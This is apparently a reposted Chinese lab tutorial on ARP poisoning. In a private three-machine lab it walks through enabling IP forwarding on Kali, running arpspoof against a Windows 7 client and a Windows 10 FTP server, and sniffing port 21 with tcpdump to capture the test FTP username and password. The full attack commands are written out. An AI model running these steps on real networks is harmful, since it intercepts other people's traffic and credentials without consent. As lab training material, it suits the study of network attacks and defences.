ARP投毒之获取密码

配置环境:
kali(中间人):192.168.3.90
win7pro(PC机):192.168.3.91
win10(ftp服务):192.168.3.83
*三台主机相互PING通

实验原理:PC机访问本网络的一台FPTserver服务的主机,中间人kali进行arp投毒,获取PC机和FTPserver主机之间的回话记录,截获用户名和密码。

ARP投毒之获取密码_第1张图片
图片.png

step1:中间人kali开启路由转发功能:
echo 1 > /proc/sys/net/ipv4/ip_forward


ARP投毒之获取密码_第2张图片

step2:进行ARP投毒

1:PC机要向FTPserver发送报文,kali欺骗PC机说自己是FTPserver;
指令:arpspoof -i eth0 -t 192.168.3.91 192.168.3.83


ARP投毒之获取密码_第3张图片
图片.png

2: 接下来开始欺骗FTP,同理,kali(中间人)进行欺骗,欺骗FTP说自己是PC机
指令:arpspoof -i eth0 -t 192.168.3.83 192.168.3.91

ARP投毒之获取密码_第4张图片
图片.png

step3:

kali(中间人) 进行抓包模式
指令:tcpdump -i eth0 -nn -X tcp port 21

ARP投毒之获取密码_第5张图片
图片.png

step4:

之前我们在win10上用(3CDaemon)搭建的FTP的用户名为admin 密码为123456

ARP投毒之获取密码_第6张图片

step5:

我们在win7pro上进行ftp命令,连接到win10(FTPserver)上,并输入之前搭建的FTP账户和密码


ARP投毒之获取密码_第7张图片
图片.png

step6:

查看刚刚我们用kali的抓包,可以准确的截获用户名和密码


ARP投毒之获取密码_第8张图片
图片.png

你可能感兴趣的:(ARP投毒之获取密码)